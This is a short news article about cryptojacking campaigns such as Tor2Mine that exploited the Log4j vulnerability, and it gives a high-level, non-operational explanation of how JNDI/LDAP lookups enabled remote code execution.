Last Updated on January 17, 2022

Crypto-Jacking is when hackers make unauthorized use of foreign devices to mine cryptocurrencies. Most recently exposed by the Log4j bug. This is done by siphoning off energy resources of devices while staying completely hidden, the objective for the miners/hackers being obtaining new tokens without incurring energy costs.

Most of these miners, including Tor2Mine, carry out these campaigns to mine Monero. The altcoin appeals to hackers due to its private and untraceable nature.

It uses Microsoft’s PowerShell scripting language to disable pre-existing malware protection in a server and execute a miner payload, which is a stealthy malware designed to farm the resources on a system.

Essentially, Log4J provides a functionality called message lookup substitution: when you log a message using Log4J, it looks for segments enclosed in ${ } and replaces those segments with a dynamically retrieved value. One of the systems which Log4j can use to retrieve data is the Java Naming and Directory Interface, whose purpose is to allow applications to look up information given a short, portable name. Now, the really terrifying part is that JNDI may contact an LDAP server (Lightweight Directory Access Protocol), which returns a response serialized as a Java class. The value of that response is extracted by executing the class. And in just three easy steps, you’ve got remote code execution.

Attacks like this have been known to occur since 2016. However, it wasn’t until December 4th, 2021, when Log4j’s maintainer submitted a patch to the project’s repository to restrict which protocols lookups could access – that the world realized that half of all Java applications had just become a ticking time bomb.

Illegal mining has become an established means to criminally obtain digital assets. A recent cyber security report by Google revealed that 86% of compromised Google Cloud accounts are used for illegal cryptocurrency mining.

More Interesting Log4j Exploit Stories